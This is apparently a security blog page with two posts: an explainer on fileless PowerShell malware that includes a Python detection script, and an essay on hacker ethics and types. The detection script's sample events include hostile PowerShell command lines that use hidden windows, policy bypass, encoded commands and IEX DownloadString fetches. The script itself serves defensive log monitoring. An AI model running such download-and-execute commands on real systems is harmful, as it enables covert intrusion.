Thursday, 26 April 2018

Finding Security Against Invisible Malware


We live in a world of possibilities: the good, the bad, and the ugly, anything can happen.
While innovators at Google are working hard to make it easy and safe for people to move around in driverless cars, hackers are already making life difficult for people, breaking into computer systems and stealing personal and sensitive data using a similar logic: fileless malware.
Also called non-malware or zero-footprint malware, fileless malware has existed for many years; however, as hackers constantly look for deceptive methods to infiltrate and attack computer systems and networks, this sophisticated technique has become increasingly popular in recent times.
Unlike a traditional malware attack, which requires code to be written to the hard disk, a zero-footprint malware attack drops no code of its own but abuses legitimate system assets and trusted processes, such as system memory and PowerShell, to infect the victim's machine. Because these are highly trusted processes, most anti-virus software does not even scan them, which gives hackers an easy and convenient way to go undetected while hiding behind a trusted process. Also known as "living off the land," this technique gives an attack more stealth and effectiveness, so hackers are increasingly using it for their nefarious activities.
A recent study by the Ponemon Institute reveals that about 9% of attacks used this method in 2016, growing to 29% in 2017, and that it is expected to reach 35% in 2018, significantly raising alert levels for both individuals and businesses. As fileless malware offers a ten times better success rate, hackers are relying on this method to attack computer networks.
With these types of security attacks on the rise, individuals and businesses need to educate themselves on the style of the attacks and on the incident response options available to them.
How does a Fileless malware attack take place?
After clicking on a cleverly disguised spam message, the user is taken to a web page that loads Flash; with its many vulnerabilities, Flash is the preferred choice of smart hackers for infecting systems.
Hackers then use Flash to reach PowerShell and send it instructions through the command line, operating purely from the computer's memory, to download a malicious PowerShell script that collects sensitive data and sends it back to the attacker.
Symptoms of a Fileless Malware Attack
Without a file installed on the computer, even traditional security tools may find it difficult to detect the presence of fileless malware. However, some warning signs your computer or network may display when infected with an invisible malware include unusual network behaviour and the computer attempting to connect to botnet servers.
Safeguards against Zero footprint malware attacks
Prevention is better than cure. Identifying an attack in its early stages may help mitigate the risk; here are some steps that help prevent an attack or reduce the damage if one occurs.
  • As hackers use existing system resources to attack your computer, disabling those components and processes when not in use is an option available to users. Disable PowerShell, macros, and Windows Management Instrumentation if you are not using them.
  • Always keep software and patches current and up to date.
  • Constantly monitor security, network, and activity logs.
  • Grant privileges and access carefully, and only to credible users.
  • Monitor the system's behaviour patterns regularly.
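As an added illustration of the log-monitoring advice above (example code written for this post, not code from the original article), the script below scores constructed process-creation records for the Flash-to-PowerShell pattern described earlier: a browser, plugin host or Office program spawning PowerShell with the hidden-window, no-profile, encoded-command or download-and-execute switches that memory-only loaders rely on. The log line format, the sample events, the parent list and the score threshold are all assumptions made for the example.

```python
import re

# Constructed sample process-creation records (not real telemetry), flattened to the
# shape an EDR or Sysmon export might take: parent image, child image, command line.
SAMPLE_EVENTS = [
    "parent=explorer.exe child=powershell.exe cmd=powershell.exe -File C:\\scripts\\backup.ps1",
    "parent=chrome.exe child=powershell.exe cmd=powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgA",
    "parent=winword.exe child=powershell.exe cmd=powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"",
    "parent=services.exe child=svchost.exe cmd=svchost.exe -k netsvcs",
    "parent=flashplayer.exe child=cmd.exe cmd=cmd.exe /c powershell -WindowStyle Hidden -NoProfile -Command IEX ...",
]

# Parents that have no routine reason to launch a shell: browsers, plugin hosts, Office.
SUSPICIOUS_PARENTS = {"chrome.exe", "firefox.exe", "iexplore.exe", "flashplayer.exe",
                      "winword.exe", "excel.exe", "outlook.exe"}

# Command-line markers typical of memory-only PowerShell loaders.
MARKERS = [
    (re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I), "encoded command"),
    (re.compile(r"\s-(w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"\s-(nop|noprofile)\b", re.I), "no profile"),
    (re.compile(r"\s-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I), "web download"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "invoke-expression"),
]

EVENT_RE = re.compile(r"^parent=(\S+) child=(\S+) cmd=(.*)$")


def score_event(line):
    """Return (parent, child, score, reasons), or None if the line is not a PowerShell launch."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    parent, child, cmd = m.group(1).lower(), m.group(2).lower(), m.group(3)
    if "powershell" not in cmd.lower():
        return None
    reasons = [label for rx, label in MARKERS if rx.search(cmd)]
    score = len(reasons)
    if parent in SUSPICIOUS_PARENTS:          # an odd parent weighs more than any single switch
        reasons.append("spawned by " + parent)
        score += 2
    return parent, child, score, reasons


def scan(lines, threshold=2):
    """Return the events whose score reaches the threshold, highest score first."""
    hits = [r for r in (score_event(l) for l in lines) if r and r[2] >= threshold]
    return sorted(hits, key=lambda r: -r[2])


if __name__ == "__main__":
    for parent, child, score, reasons in scan(SAMPLE_EVENTS):
        print(f"{score:>2}  {parent} -> {child}: {', '.join(reasons)}")
```

The benign backup script launched from Explorer scores zero and is not reported, while the three launches from Chrome, Flash and Word are, with the reasons listed so an analyst can see which switches tripped the rule.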

Monday, 23 April 2018

The Hacker Code of Ethics


Cyber-terrorists were once hackers, and maybe that's why the media treat them as such. But if they were, why aren't they anymore?
Every hacker has a strict code of ethics by which he always tries to distinguish right from wrong; from the moment that code is ignored and his actions become destructive, that individual can no longer be considered a hacker by the community.
To better understand this code of ethics, know the three pillars of the hacker community: Collaboration, Knowledge, Freedom.
Richard Stallman, who stood out and is considered one of the most excellent hackers of the twentieth century, bases his ethics on these three pillars, which were also the basis for the creation of the Free Software Foundation, copyleft, and free software.
When a hacker loses his ethics, we move into a sub-division of this narrow hierarchy. Many imagine that he turns into a cracker, but that is not so; even within the hacker classification there are two sub-types. While we can call someone a hacker, he is a white hat who uses his ethics as a guide. When a hacker loses this ethic he is considered a black hat: he uses his knowledge and his unique way of thinking without any code of ethics, performing actions for his own benefit, for espionage, or even for fun.
Crackers are people in the hacker community who specialize in code-breaking: those who break password hashes and program protection keys.
In the community we also have the so-called Social Engineer, who uses non-technical means to obtain privileged information. He is usually a master at deceiving people.
Scammers: fraudsters who use flaws in common programs such as IE, plus a bit of social engineering, to send lay users to fake sites with the goal of capturing access passwords and the like.
Script Kiddie: this guy has no in-depth knowledge or defined targets. He searches the internet for ready-made scripts to carry out his attacks. For kiddies, what matters is the number of sites they invade, not the quality. Thus they "scratch" thousands of websites every day, changing major web pages of some small business and sometimes actually accessing essential files.
Defacer: a Script Kiddie who only cares about replacing the main page of any website.
Lammer: a Script Kiddie with little knowledge, but posing as a "technology guru." These turn up in the IT market.
When it comes to hacker ethics and history, I always get two pictures:
Cathedral Method
• Ken Thompson and Dennis Ritchie (Unix)
• Donald E. Knuth (TeX, MetaFont)
• Richard Stallman (GNU Project, FSF, GPL license, gcc, emacs, …)
Bazaar Method
• Linus Torvalds, inventor and first implementer of the Linux kernel
• Bruce Perens, one of the first coordinators of the Debian project
For all lovers of information security, here is a must-read: https://bit.ly/14JwODI
From 1980 to the present day, the internet has evolved very, very fast. Today it is possible to get access to quality information quickly. It is just a matter of deciding what you want for your life. I found some great free courses at Cybrary. This is fantastic!
This article is for beginners and the curious. For beginners, I recommend doing some basic courses in the security area.
Here are some links that came to mind when writing this blog:
Security Conferences:
Videos:
• https://www.youtube.com/watch?v=o8NPllzkFhE
Fun:
